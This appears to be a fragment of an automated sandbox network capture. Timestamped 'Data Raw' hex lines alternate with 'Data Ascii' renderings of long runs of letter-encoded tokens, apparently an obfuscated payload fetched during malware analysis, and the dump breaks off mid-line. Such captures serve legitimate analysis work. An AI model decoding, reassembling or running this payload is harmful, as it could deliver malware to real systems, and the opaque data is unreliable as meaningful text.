                                                                                                Data Ascii: MP Un TTM TgO pO pg Tip gn gP MgO TSM Tgn P Mgp MMP n Mgn Up Tgn MPP TOT TPi TnM TOp TiS TPn TPp TiP TpM OP i TTn pn gP MiP OM Ti Tgn UM TMi TMM MMg TSp TPO TSU S Mgi MPT TiU PU in MiM Ug OM iO TST OS Up MPM TnS S MgO in Un gS TUM ig Tpi TM ng TOO TUS Un
                                                                                                2021-10-26 15:35:11 UTC2180INData Raw: 70 20 54 67 4f 20 50 70 20 54 55 54 20 50 69 20 54 50 70 20 4d 4f 20 4f 50 20 54 54 69 20 6e 4f 20 4f 69 20 54 53 70 20 54 54 55 20 4d 50 67 20 54 55 4d 20 54 53 67 20 54 50 54 20 54 50 54 20 54 6e 67 20 54 70 4f 20 67 70 20 4d 67 70 20 4d 67 53 20 4d 50 67 20 54 6e 69 20 4f 50 20 4d 50 4d 20 54 4d 69 20 54 67 55 20 50 4d 20 54 67 4f 20 4f 54 20 4d 20 6e 55 20 4d 4d 4f 20 4d 4d 6e 20 69 53 20 4d 69 50 20 4d 4d 70 20 54 70 55 20 54 4d 55 20 54 53 4f 20 69 54 20 4d 69 53 20 4d 69 6e 20 54 4d 4f 20 6e 6e 20 4d 69 4d 20 54 55 6e 20 54 6e 20 54 54 20 54 55 6e 20 4d 4d 54 20 54 53 20 4d 4d 67 20 4d 55 20 54 53 53 20 54 69 6e 20 54 54 4d 20 54 4d 55 20 54 67 55 20 4d 53 53 20 50 67 20 54 53 55 20 4d 53 54 20 4d 53 4f 20 54 4f 50 20 54 4d 55 20 4f 69 20 4d 67 50
                                                                                                Data Ascii: p TgO Pp TUT Pi TPp MO OP TTi nO Oi TSp TTU MPg TUM TSg TPT TPT Tng TpO gp Mgp MgS MPg Tni OP MPM TMi TgU PM TgO OT M nU MMO MMn iS MiP MMp TpU TMU TSO iT MiS Min TMO nn MiM TUn Tn TT TUn MMT TS MMg MU TSS Tin TTM TMU TgU MSS Pg TSU MST MSO TOP TMU Oi MgP
                                                                                                2021-10-26 15:35:11 UTC2196INData Raw: 6e 20 6e 67 20 4d 55 20 4d 50 4d 20 4d 53 53 20 54 55 70 20 54 53 70 20 4d 50 69 20 4d 4d 4f 20 6e 20 54 67 70 20 54 4d 53 20 4d 69 20 54 69 55 20 4d 50 69 20 54 53 69 20 4f 67 20 69 54 20 6e 4f 20 54 54 55 20 55 69 20 54 55 4f 20 54 70 4d 20 54 6e 6e 20 4d 53 6e 20 4d 67 54 20 4d 4d 54 20 4d 4d 4f 20 4f 6e 20 54 6e 69 20 54 55 20 53 20 4d 69 4f 20 54 50 20 54 67 50 20 67 50 20 67 67 20 4d 67 67 20 70 4d 20 54 55 54 20 54 6e 4f 20 4d 53 6e 20 6e 69 20 54 4f 6e 20 70 67 20 54 69 54 20 4d 4d 20 55 50 20 54 50 4f 20 6e 70 20 4f 70 20 54 50 4d 20 4d 53 4d 20 54 69 20 4d 67 53 20 4d 69 55 20 6e 6e 20 54 69 67 20 4f 55 20 54 53 67 20 67 4d 20 54 4f 70 20 6e 6e 20 55 20 54 4d 20 54 6e 67 20 4d 67 70 20 69 67 20 54 4d 50 20 4d 69 70 20 54 4d 67 20 67 67 20 4d 50
                                                                                                Data Ascii: n ng MU MPM MSS TUp TSp MPi MMO n Tgp TMS Mi TiU MPi TSi Og iT nO TTU Ui TUO TpM Tnn MSn MgT MMT MMO On Tni TU S MiO TP TgP gP gg Mgg pM TUT TnO MSn ni TOn pg TiT MM UP TPO np Op TPM MSM Ti MgS MiU nn Tig OU TSg gM TOp nn U TM Tng Mgp ig TMP Mip TMg gg MP
                                                                                                2021-10-26 15:35:11 UTC2212INData Raw: 4f 20 54 4d 4f 20 50 4d 20 67 4d 20 4d 50 69 20 69 69 20 54 54 54 20 55 20 67 4f 20 4d 54 67 20 67 54 20 6e 4f 20 69 53 20 4d 50 50 20 54 69 4d 20 54 6e 6e 20 54 6e 6e 20 54 69 20 54 54 4f 20 4d 53 20 4d 54 20 50 6e 20 54 4d 4f 20 54 4d 69 20 4d 50 67 20 4d 54 4d 20 4d 69 53 20 6e 50 20 55 55 20 54 4d 20 67 67 20 54 54 50 20 6e 50 20 4d 69 67 20 54 54 69 20 54 53 6e 20 4d 67 4f 20 54 55 50 20 54 4d 6e 20 54 54 4d 20 4d 50 54 20 50 54 20 6e 70 20 4d 53 67 20 54 53 70 20 54 6e 20 4d 54 55 20 54 50 53 20 6e 4d 20 70 70 20 67 70 20 4f 55 20 54 69 4f 20 54 6e 4d 20 4d 54 4d 20 54 67 4f 20 4d 4d 50 20 4d 54 53 20 54 69 20 54 54 53 20 54 55 54 20 4d 54 55 20 4d 69 50 20 54 6e 4d 20 4d 53 70 20 4f 70 20 70 55 20 69 4f 20 55 6e 20 4d 50 53 20 54 6e 4d 20 55 55 20
                                                                                                Data Ascii: O TMO PM gM MPi ii TTT U gO MTg gT nO iS MPP TiM Tnn Tnn Ti TTO MS MT Pn TMO TMi MPg MTM MiS nP UU TM gg TTP nP Mig TTi TSn MgO TUP TMn TTM MPT PT np MSg TSp Tn MTU TPS nM pp gp OU TiO TnM MTM TgO MMP MTS Ti TTS TUT MTU MiP TnM MSp Op pU iO Un MPS TnM UU
                                                                                                2021-10-26 15:35:11 UTC2228INData Raw: 20 4f 6e 20 54 54 50 20 69 6e 20 54 55 6e 20 54 54 69 20 4d 53 53 20 54 55 53 20 54 54 54 20 55 67 20 54 54 55 20 4d 54 20 54 4f 55 20 70 53 20 54 70 67 20 4d 54 67 20 54 4d 69 20 54 54 4f 20 4f 20 54 6e 69 20 54 53 6e 20 54 6e 70 20 54 53 50 20 67 55 20 4d 20 54 4f 4d 20 4f 54 20 4d 67 20 54 4f 55 20 4d 54 69 20 4d 53 69 20 50 50 20 4d 53 55 20 54 69 4d 20 6e 50 20 54 54 53 20 4f 50 20 4d 50 50 20 6e 20 4d 55 20 50 20 69 20 4f 70 20 54 54 69 20 54 67 55 20 4d 67 50 20 4d 69 6e 20 54 70 69 20 4d 4d 69 20 55 50 20 54 55 55 20 70 4f 20 54 4d 70 20 54 4d 50 20 55 55 20 54 69 4d 20 4f 6e 20 50 53 20 67 54 20 50 50 20 4d 67 54 20 4d 50 53 20 54 53 4f 20 4f 20 4d 69 67 20 4d 4d 70 20 4d 53 20 4d 50 54 20 54 70 70 20 54 50 54 20 54 54 6e 20 54 67 4d 20 4d 54 4d
                                                                                                Data Ascii: On TTP in TUn TTi MSS TUS TTT Ug TTU MT TOU pS Tpg MTg TMi TTO O Tni TSn Tnp TSP gU M TOM OT Mg TOU MTi MSi PP MSU TiM nP TTS OP MPP n MU P i Op TTi TgU MgP Min Tpi MMi UP TUU pO TMp TMP UU TiM On PS gT PP MgT MPS TSO O Mig MMp MS MPT Tpp TPT TTn TgM MTM
                                                                                                2021-10-26 15:35:11 UTC2244INData Raw: 20 69 4d 20 55 69 20 69 70 20 54 50 4f 20 54 50 53 20 54 4f 50 20 4d 50 4d 20 54 4d 55 20 70 6e 20 70 20 6e 6e 20 69 67 20 4d 69 50 20 70 6e 20 54 55 53 20 69 53 20 70 67 20 4d 67 6e 20 4f 53 20 55 4f 20 70 50 20 55 50 20 54 54 4d 20 50 53 20 50 69 20 4d 69 6e 20 6e 50 20 4f 55 20 54 67 69 20 4d 4d 69 20 4d 69 4d 20 4d 67 55 20 4d 67 4d 20 67 4d 20 54 4d 54 20 54 69 4f 20 4d 50 20 54 4f 4f 20 4d 67 69 20 55 67 20 54 53 55 20 54 54 20 4d 50 53 20 67 4d 20 4f 4f 20 54 67 4f 20 4d 69 4f 20 50 20 4d 4d 70 20 54 55 4f 20 54 67 50 20 4d 4d 20 54 69 53 20 4d 54 67 20 4d 4d 69 20 67 6e 20 54 67 70 20 54 67 69 20 54 67 4f 20 4d 67 54 20 4d 54 20 54 67 70 20 69 4d 20 4d 54 67 20 54 4f 67 20 4d 53 50 20 54 53 55 20 4f 69 20 69 20 4d 69 53 20 54 4d 67 20 4d 69 20 4d
                                                                                                Data Ascii: iM Ui ip TPO TPS TOP MPM TMU pn p nn ig MiP pn TUS iS pg Mgn OS UO pP UP TTM PS Pi Min nP OU Tgi MMi MiM MgU MgM gM TMT TiO MP TOO Mgi Ug TSU TT MPS gM OO TgO MiO P MMp TUO TgP MM TiS MTg MMi gn Tgp Tgi TgO MgT MT Tgp iM MTg TOg MSP TSU Oi i MiS TMg Mi M
                                                                                                2021-10-26 15:35:11 UTC2260INData Raw: 54 67 55 20 54 54 70 20 4d 50 54 20 54 70 55 20 54 50 4d 20 4d 67 70 20 4d 69 4f 20 54 6e 4f 20 4d 69 54 20 4d 4d 69 20 54 69 4f 20 54 50 55 20 4f 55 20 4f 50 20 4d 67 70 20 54 6e 54 20 54 4f 55 20 4d 53 4d 20 54 69 50 20 54 6e 55 20 4d 20 4f 69 20 67 4d 20 54 4d 53 20 54 53 20 70 20 54 67 54 20 4d 4d 70 20 6e 69 20 54 54 4d 20 54 4d 69 20 6e 4d 20 4f 4f 20 4d 54 4d 20 69 53 20 70 70 20 54 53 6e 20 4d 53 50 20 4d 69 53 20 4d 69 53 20 4d 4f 20 4d 4d 20 54 50 67 20 55 4f 20 4d 50 67 20 4d 53 50 20 4f 4d 20 69 50 20 69 54 20 54 53 53 20 54 54 20 4f 67 20 54 70 69 20 67 55 20 4d 53 55 20 4f 67 20 54 4d 6e 20 54 4f 4f 20 54 53 50 20 69 67 20 69 70 20 70 67 20 54 6e 4d 20 4d 4d 4d 20 4d 67 6e 20 54 6e 67 20 54 50 53 20 67 20 69 6e 20 54 55 4f 20 67 53 20 4d 54
                                                                                                Data Ascii: TgU TTp MPT TpU TPM Mgp MiO TnO MiT MMi TiO TPU OU OP Mgp TnT TOU MSM TiP TnU M Oi gM TMS TS p TgT MMp ni TTM TMi nM OO MTM iS pp TSn MSP MiS MiS MO MM TPg UO MPg MSP OM iP iT TSS TT Og Tpi gU MSU Og TMn TOO TSP ig ip pg TnM MMM Mgn Tng TPS g in TUO gS MT
                                                                                                2021-10-26 15:35:11 UTC2264INData Raw: 20 4d 54 4d 20 4d 53 53 20 69 70 20 4f 54 20 54 67 4d 20 54 67 50 20 54 70 55 20 54 70 4d 20 54 4f 70 20 4d 4d 4f 20 69 70 20 4f 69 20 4d 55 20 4d 53 53 20 6e 67 20 55 6e 20 4d 4f 20 54 50 4d 20 50 70 20 4d 6e 20 67 69 20 4d 4d 6e 20 54 50 20 54 4d 67 20 50 4d 20 54 70 6e 20 54 69 6e 20 54 53 53 20 54 4d 55 20 54 6e 50 20 54 4f 20 4f 67 20 4d 55 20 55 54 20 50 4d 20 54 70 50 20 54 69 4f 20 54 55 67 20 50 55 20 4d 53 70 20 6e 70 20 4d 50 53 20 4d 4d 70 20 4d 67 50 20 4d 69 70 20 4d 67 4f 20 54 69 4d 20 4d 4d 70 20 4d 67 70 20 54 54 4f 20 4d 54 55 20 54 4f 4d 20 54 55 67 20 4d 50 50 20 4d 4d 69 20 54 4d 50 20 4d 53 53 20 6e 70 20 55 70 20 6e 6e 20 4d 54 54 20 6e 4f 20 54 4f 20 4d 69 50 20 54 6e 4d 20 4d 53 53 20 54 67 70 20 54 54 4f 20 67 67 20 67 54 20 54
                                                                                                Data Ascii: MTM MSS ip OT TgM TgP TpU TpM TOp MMO ip Oi MU MSS ng Un MO TPM Pp Mn gi MMn TP TMg PM Tpn Tin TSS TMU TnP TO Og MU UT PM TpP TiO TUg PU MSp np MPS MMp MgP Mip MgO TiM MMp Mgp TTO MTU TOM TUg MPP MMi TMP MSS np Up nn MTT nO TO MiP TnM MSS Tgp TTO gg gT T
                                                                                                2021-10-26 15:35:11 UTC2280INData Raw: 55 20 69 4d 20 4d 4d 53 20 69 20 54 70 50 20 69 69 20 4d 54 50 20 54 50 70 20 54 53 20 4d 4d 70 20 4d 69 4d 20 4d 69 50 20 54 4f 20 4d 53 54 20 54 55 54 20 54 67 6e 20 4f 4f 20 4f 67 20 70 6e 20 4d 54 53 20 4d 67 70 20 55 20 55 67 20 4d 53 55 20 4d 69 67 20 50 4f 20 6e 54 20 4d 20 4d 53 50 20 4d 70 20 54 67 70 20 54 67 20 54 67 6e 20 4d 4d 70 20 54 4f 4f 20 54 53 69 20 4d 67 4f 20 54 50 54 20 6e 70 20 69 55 20 54 70 67 20 54 53 53 20 4f 53 20 54 55 4f 20 54 50 50 20 4d 4d 54 20 54 55 70 20 4f 69 20 4d 69 70 20 54 50 54 20 69 50 20 55 70 20 55 55 20 70 54 20 50 4f 20 54 4d 67 20 54 67 4d 20 54 50 50 20 54 50 6e 20 4d 55 20 4f 55 20 54 69 50 20 54 6e 54 20 55 53 20 54 4f 4f 20 54 4f 55 20 6e 67 20 54 53 6e 20 54 4d 69 20 4d 67 6e 20 6e 6e 20 54 69 4f 20 4d
                                                                                                Data Ascii: U iM MMS i TpP ii MTP TPp TS MMp MiM MiP TO MST TUT Tgn OO Og pn MTS Mgp U Ug MSU Mig PO nT M MSP Mp Tgp Tg Tgn MMp TOO TSi MgO TPT np iU Tpg TSS OS TUO TPP MMT TUp Oi Mip TPT iP Up UU pT PO TMg TgM TPP TPn MU OU TiP TnT US TOO TOU ng TSn TMi Mgn nn TiO M
                                                                                                2021-10-26 15:35:11 UTC2296INData Raw: 4f 20 69 53 20 4d 69 4d 20 4d 67 4d 20 54 4f 6e 20 54 67 4f 20 54 54 4d 20 55 69 20 4d 4d 50 20 50 4d 20 4d 4d 4d 20 69 54 20 54 4f 6e 20 54 69 6e 20 54 50 4f 20 4d 50 50 20 4f 69 20 4d 67 53 20 54 69 4f 20 4d 69 20 6e 53 20 50 4d 20 54 67 55 20 54 54 55 20 4d 50 53 20 4d 4d 53 20 54 6e 4d 20 54 54 50 20 4d 69 69 20 4f 4f 20 6e 69 20 4d 53 4f 20 4d 50 53 20 4d 69 20 4d 67 53 20 54 20 4d 67 55 20 54 50 55 20 4d 67 4d 20 54 53 4f 20 70 6e 20 54 50 20 54 54 54 20 4f 20 54 69 6e 20 4d 54 55 20 4d 53 6e 20 4d 53 70 20 54 53 70 20 54 67 20 50 53 20 50 70 20 50 54 20 54 50 55 20 4f 4d 20 54 4f 53 20 55 4d 20 4d 54 53 20 54 4d 69 20 54 6e 4d 20 54 6e 4d 20 4d 4d 6e 20 4d 67 20 67 67 20 54 6e 4d 20 54 55 4f 20 55 4d 20 54 53 70 20 54 4d 4f 20 55 4f 20 4d 4d 6e 20
                                                                                                Data Ascii: O iS MiM MgM TOn TgO TTM Ui MMP PM MMM iT TOn Tin TPO MPP Oi MgS TiO Mi nS PM TgU TTU MPS MMS TnM TTP Mii OO ni MSO MPS Mi MgS T MgU TPU MgM TSO pn TP TTT O Tin MTU MSn MSp TSp Tg PS Pp PT TPU OM TOS UM MTS TMi TnM TnM MMn Mg gg TnM TUO UM TSp TMO UO MMn
                                                                                                2021-10-26 15:35:11 UTC2312INData Raw: 20 4d 67 55 20 4d 53 69 20 4d 4d 50 20 6e 70 20 54 69 20 54 53 54 20 55 67 20 70 54 20 54 50 69 20 54 55 20 4d 69 50 20 6e 4d 20 67 53 20 54 67 20 4d 69 6e 20 54 55 53 20 67 70 20 4d 53 53 20 54 69 4d 20 54 67 4d 20 55 55 20 55 53 20 54 50 4f 20 6e 70 20 54 70 6e 20 54 54 4f 20 54 50 4f 20 67 20 54 4d 67 20 54 67 6e 20 67 67 20 54 54 69 20 4d 50 69 20 54 70 54 20 54 6e 55 20 69 4d 20 54 54 54 20 54 67 54 20 54 6e 67 20 4f 20 4d 6e 20 6e 55 20 54 53 4f 20 4d 54 55 20 54 4f 69 20 4d 54 6e 20 54 4f 54 20 54 53 69 20 69 53 20 54 4d 54 20 54 4d 4f 20 54 55 4d 20 4d 69 54 20 54 69 4f 20 4d 50 69 20 4f 54 20 54 67 4d 20 54 4f 54 20 69 20 6e 54 20 54 70 69 20 54 70 53 20 4d 69 20 69 54 20 67 4f 20 4d 54 54 20 54 4f 54 20 4d 53 69 20 54 4f 70 20 55 67 20 54 4d 69
                                                                                                Data Ascii: MgU MSi MMP np Ti TST Ug pT TPi TU MiP nM gS Tg Min TUS gp MSS TiM TgM UU US TPO np Tpn TTO TPO g TMg Tgn gg TTi MPi TpT TnU iM TTT TgT Tng O Mn nU TSO MTU TOi MTn TOT TSi iS TMT TMO TUM MiT TiO MPi OT TgM TOT i nT Tpi TpS Mi iT gO MTT TOT MSi TOp Ug TMi
                                                                                                2021-10-26 15:35:11 UTC2328INData Raw: 54 20 4d 55 20 69 67 20 70 70 20 4d 54 54 20 4d 4d 50 20 55 50 20 69 53 20 54 4d 50 20 4d 4d 4d 20 6e 50 20 54 69 67 20 6e 20 50 4d 20 4d 54 70 20 54 4d 54 20 4d 54 4f 20 54 69 55 20 54 70 54 20 54 54 53 20 54 55 50 20 4d 53 6e 20 55 53 20 54 70 55 20 69 50 20 54 67 67 20 54 54 67 20 4d 53 55 20 69 70 20 54 54 67 20 54 50 55 20 54 6e 54 20 54 54 67 20 54 70 50 20 54 70 4f 20 4d 69 20 55 6e 20 69 20 70 4f 20 54 70 70 20 4d 4d 6e 20 54 55 4f 20 54 54 54 20 54 70 69 20 67 67 20 54 70 20 54 4f 53 20 4d 54 20 54 69 4d 20 54 50 67 20 54 4f 50 20 54 67 70 20 54 70 20 54 55 4f 20 4d 54 20 54 4d 53 20 55 4f 20 70 67 20 4d 4d 20 54 4f 54 20 54 50 67 20 54 4f 4d 20 69 20 54 70 4f 20 54 6e 70 20 54 54 54 20 69 20 4d 4d 6e 20 55 54 20 54 55 70 20 54 69 4d 20 50 70 20
                                                                                                Data Ascii: T MU ig pp MTT MMP UP iS TMP MMM nP Tig n PM MTp TMT MTO TiU TpT TTS TUP MSn US TpU iP Tgg TTg MSU ip TTg TPU TnT TTg TpP TpO Mi Un i pO Tpp MMn TUO TTT Tpi gg Tp TOS MT TiM TPg TOP Tgp Tp TUO MT TMS UO pg MM TOT TPg TOM i TpO Tnp TTT i MMn UT TUp TiM Pp
                                                                                                2021-10-26 15:35:11 UTC2344INData Raw: 54 67 20 4f 55 20 4d 4d 6e 20 70 67 20 54 4d 55 20 55 54 20 54 55 4d 20 4d 69 53 20 54 50 55 20 4d 55 20 70 67 20 54 53 70 20 54 4d 4f 20 67 4f 20 54 20 6e 54 20 70 55 20 4d 54 55 20 54 67 50 20 6e 4d 20 67 20 4d 67 50 20 54 54 20 54 55 55 20 50 70 20 4d 67 67 20 4d 54 4d 20 54 54 4d 20 54 4d 67 20 4d 54 55 20 54 55 67 20 54 4d 20 67 6e 20 70 54 20 54 53 6e 20 54 70 50 20 4d 67 4f 20 4d 54 70 20 54 4f 4d 20 54 53 20 54 67 70 20 54 6e 53 20 55 53 20 4d 69 69 20 54 67 67 20 54 4d 4d 20 6e 54 20 54 6e 6e 20 4d 50 67 20 4f 69 20 4d 4d 69 20 54 6e 50 20 4d 55 20 69 54 20 54 54 50 20 54 70 4d 20 4f 6e 20 54 6e 20 54 50 55 20 55 20 6e 69 20 67 53 20 50 6e 20 70 20 67 4d 20 4d 54 69 20 4d 69 54 20 53 20 4d 50 69 20 54 67 50 20 4d 69 4f 20 69 4f 20 4d 67 4f 20 54
                                                                                                Data Ascii: Tg OU MMn pg TMU UT TUM MiS TPU MU pg TSp TMO gO T nT pU MTU TgP nM g MgP TT TUU Pp Mgg MTM TTM TMg MTU TUg TM gn pT TSn TpP MgO MTp TOM TS Tgp TnS US Mii Tgg TMM nT Tnn MPg Oi MMi TnP MU iT TTP TpM On Tn TPU U ni gS Pn p gM MTi MiT S MPi TgP MiO iO MgO T
                                                                                                2021-10-26 15:35:11 UTC2360INData Raw: 20 4d 54 55 20 4d 54 4d 20 67 4d 20 55 20 4d 4d 70 20 54 70 69 20 54 6e 20 54 69 55 20 4d 53 4f 20 54 55 20 4d 67 50 20 69 67 20 54 67 6e 20 54 67 53 20 54 6e 53 20 54 4d 20 50 4f 20 54 54 4d 20 6e 69 20 54 70 6e 20 54 54 53 20 54 70 70 20 55 6e 20 70 70 20 54 50 4d 20 54 69 67 20 4d 54 70 20 69 4f 20 67 67 20 70 67 20 4d 54 4d 20 54 70 6e 20 54 54 54 20 4d 67 70 20 6e 4f 20 54 67 69 20 4d 69 69 20 4d 69 55 20 4d 50 20 54 54 50 20 54 50 50 20 54 53 4f 20 69 53 20 4d 50 69 20 4d 54 6e 20 69 20 54 55 67 20 4d 69 4d 20 54 6e 67 20 4d 69 4d 20 69 20 54 4d 70 20 4d 67 4d 20 54 4f 55 20 4d 67 50 20 70 4f 20 4d 50 50 20 55 55 20 4d 4d 70 20 70 67 20 50 67 20 4d 69 4d 20 55 69 20 4d 67 69 20 54 70 20 54 53 50 20 4d 50 53 20 69 53 20 54 4d 4f 20 4d 50 54 20 4f 53
                                                                                                Data Ascii: MTU MTM gM U MMp Tpi Tn TiU MSO TU MgP ig Tgn TgS TnS TM PO TTM ni Tpn TTS Tpp Un pp TPM Tig MTp iO gg pg MTM Tpn TTT Mgp nO Tgi Mii MiU MP TTP TPP TSO iS MPi MTn i TUg MiM Tng MiM i TMp MgM TOU MgP pO MPP UU MMp pg Pg MiM Ui Mgi Tp TSP MPS iS TMO MPT OS
                                                                                                2021-10-26 15:35:11 UTC2376INData Raw: 4f 20 54 54 55 20 54 54 70 20 54 4d 67 20 54 4d 53 20 54 4f 20 69 4d 20 69 50 20 70 54 20 69 4f 20 54 54 55 20 54 54 70 20 54 4d 67 20 54 4d 53 20 54 4f 20 67 69 20 50 4d 20 69 54 20 50 4d 20 54 4d 67 20 54 4d 70 20 54 54 6e 20 54 54 53 20 54 4d 20 67 69 20 50 4d 20 69 54 20 50 4d 20 54 4d 67 20 54 4d 70 20 54 54 6e 20 54 53 4d 20 4d 54 20 50 69 20 69 4f 20 67 70 20 70 4d 20 54 54 6e 20 54 53 69 20 54 53 70 20 54 53 4d 20 4d 54 20 50 69 20 69 4f 20 67 70 20 70 4d 20 54 54 6e 20 69 20 53 20 53 20 53 20 4d 4d 20 53 20 53 20 53 20 4d 69 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 70 70 20 53 20 53 20 53 20 70 55 20 53 20 53 20 53 20 6e 53 20 53 20 53 20 53 20 6e 4d 20 53 20 53 20 53 20 6e 69 20 53 20 53 20 53 20 6e 70 20 53 20 53 20 53 20 4f 4d 20 53 20
                                                                                                Data Ascii: O TTU TTp TMg TMS TO iM iP pT iO TTU TTp TMg TMS TO gi PM iT PM TMg TMp TTn TTS TM gi PM iT PM TMg TMp TTn TSM MT Pi iO gp pM TTn TSi TSp TSM MT Pi iO gp pM TTn i S S S MM S S S Mi S S S pi S S S pp S S S pU S S S nS S S S nM S S S ni S S S np S S S OM S
                                                                                                2021-10-26 15:35:11 UTC2392INData Raw: 20 55 4f 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 54 69 20 54 4f 54 20 4d 50 4d 20 67 20 54 54 4d 20 54 54 69 20 54 6e 4d 20 4d 50 67 20 67 20 54 54 4d 20 54 54 69 20 54 55 6e 20 4d 50 4d 20 67 20 54 54 4d 20 69 53 20 4d 70 20 53 20 53 20 70 20 53 20 67 4d 20 4f 53 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 54 69 20 4d 4d 55 20 4d 50 67 20 67 20 54 54 4d 20 54 54 69 20 55 70 20 4d 50 69 20 67 20 54 54 4d 20 54 54 69 20 54 55 6e 20 4d 50 4d 20 67 20 54 54 4d 20 69 53 20 4d 70 20 53 20 53 20 70 20 53 20 67 4d 20 4f 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 54 69 20 54 67 55 20 4d 50 69 20 67 20 54 54 4d 20 54 54 69 20 4d 4d 69 20 4d 50 69 20 67 20 54 54 4d 20 54 54 69 20 54 4d 67 20 4d 50 53 20 67 20 54 54 4d
                                                                                                Data Ascii: UO S S S MPi Ti M S TTi TOT MPM g TTM TTi TnM MPg g TTM TTi TUn MPM g TTM iS Mp S S p S gM OS S S S MPi Ti M S TTi MMU MPg g TTM TTi Up MPi g TTM TTi TUn MPM g TTM iS Mp S S p S gM OT S S S MPi Ti M S TTi TgU MPi g TTM TTi MMi MPi g TTM TTi TMg MPS g TTM
                                                                                                2021-10-26 15:35:11 UTC2408INData Raw: 4d 20 4d 20 53 20 53 20 53 20 4d 50 69 20 54 20 50 70 20 50 20 53 20 53 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 55 20 53 20 4d 50 69 20 54 4d 20 55 20 53 20 50 6e 20 4d 55 20 53 20 53 20 53 20 67 4d 20 54 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 50 20 53 20 54 54 54 20 54 4f 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 53 20 53 20 50 70 20 6e 55 20 54 20 53 20 53 20 53 20 53 20 67 4d 20 54 67 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 69 20 53 20 4d 50 69 20 4f 20 54 20 53 20 54 54 54 20 55 4f 20 53 20 53 20 54 53 20 67 4d 20 69 20 53 20 53 20 53 20 4d 50 69 20 54 20 4d 50 69 20 54 69 20 4f 20 53 20 4d 50 69 20 54 4d 20 4f 20 53 20 50 6e 20 67 67 20 53 20 53 20 53
                                                                                                Data Ascii: M M S S S MPi T Pp P S S S gM T S S S MPi Ti U S MPi TM U S Pn MU S S S gM TT S S S MPi Ti g S MPi TM P S TTT TO S S TS MPi Ti S S Pp nU T S S S S gM Tg S S S MPi Ti g S MPi TM i S MPi O T S TTT UO S S TS gM i S S S MPi T MPi Ti O S MPi TM O S Pn gg S S S
                                                                                                2021-10-26 15:35:11 UTC2424INData Raw: 67 20 54 20 70 20 70 4f 20 4d 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 53 53 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 4d 4d 20 67 4d 20 54 54 6e 20 54 53 20 53 20 53 20 54 20 4d 53 20 4d 50 69 20 67 20 70 20 4d 4d 20 4d 50 69 20 67 20 4f 50 20 6e 20 4d 4d 20 4d 50 69 20 54 20 4f 50 20 4d 50 69 20 54 6e 20 54 54 70 20 54 53 20 53 20 53 20 54 20 69 53 20 54 70 20 53 20 53 20 54 53 20 4d 4d 4d 20 54 4f 55 20 67 4d 20 50 54 20 53 20 54 53 20 54 4d 55 20 69 53 20 54 6e 20 53 20 53 20 54 53 20 54 4d 4d 20 6e 20 69 69 20 70 20 69 53 20 54 69 20 53 20 53 20 54 53 20 53 20 69 4d 20 70 50 20 4d 55 20 53 20 53 20 54 20 53 20 53 20 53 20 54 20 53 20 53 20 53 20 54 67 69 20 4d 20 53 20 53 20 54 50 50 20 4d 20 53 20 53 20 54 4d 20 53 20 53 20 53 20 54 67 50 20
                                                                                                Data Ascii: g T p pO M S S S S S S S TSS MPP MPP MPP MMM gM TTn TS S S T MS MPi g p MM MPi g OP n MM MPi T OP MPi Tn TTp TS S S T iS Tp S S TS MMM TOU gM PT S TS TMU iS Tn S S TS TMM n ii p iS Ti S S TS S iM pP MU S S T S S S T S S S Tgi M S S TPP M S S TM S S S TgP
                                                                                                2021-10-26 15:35:11 UTC2440INData Raw: 20 53 20 53 20 53 20 67 54 20 50 69 20 54 50 6e 20 67 6e 20 67 4d 20 6e 20 53 20 53 20 53 20 67 54 20 50 69 20 54 50 6e 20 67 6e 20 67 4d 20 6e 20 53 20 53 20 53 20 67 54 20 54 53 54 20 54 50 6e 20 67 6e 20 4d 4f 20 67 54 20 54 54 54 20 54 50 6e 20 67 6e 20 67 4d 20 70 20 53 20 53 20 53 20 67 54 20 54 53 54 20 54 50 6e 20 67 6e 20 67 4d 20 70 20 53 20 53 20 53 20 67 54 20 69 55 20 54 50 6e 20 67 6e 20 67 4d 20 70 20 53 20 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 4d 55 20 67 54 20 54 54 69 20 54 50 6e 20 67 6e 20 67 4d 20 50 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 4d 20 50 20 53 20 53 20 53 20 67 54 20 4f 4f 20 54 50 6e 20 67 6e 20 67 4d 20 50 20 53 20 53 20 53 20 67 54 20 50 70 20 54 50 6e 20 67 6e 20 4d 6e 20 67 54 20
                                                                                                Data Ascii: S S S gT Pi TPn gn gM n S S S gT Pi TPn gn gM n S S S gT TST TPn gn MO gT TTT TPn gn gM p S S S gT TST TPn gn gM p S S S gT iU TPn gn gM p S S S gT PT TPn gn MU gT TTi TPn gn gM P S S S gT TSM TPn gn gM P S S S gT OO TPn gn gM P S S S gT Pp TPn gn Mn gT
                                                                                                2021-10-26 15:35:11 UTC2456INData Raw: 4d 55 20 54 69 53 20 4f 4f 20 55 53 20 4d 20 55 70 20 54 4d 55 20 4d 69 70 20 55 4f 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 50 4d 20 55 4d 20 55 53 20 4d 20 55 70 20 54 4d 55 20 50 54 20 54 67 4f 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 50 67 20 4f 4d 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 67 55 20 6e 4f 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 6e 4d 20 4f 70 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 4f 67 20 4d 67 20 55 53 20 4d 20 55 70 20 54 4d 55 20 4d 4d 55 20 54 53 55 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 70 70 20 4f 55 20 55 53 20 4d 20 55 70 20 54 4d 55 20 4d 67 70 20 54 54 67 20 55 53 20 4d 20 55 70 20 54 4d 55 20 54 70 69 20 50 70 20 55 53 20 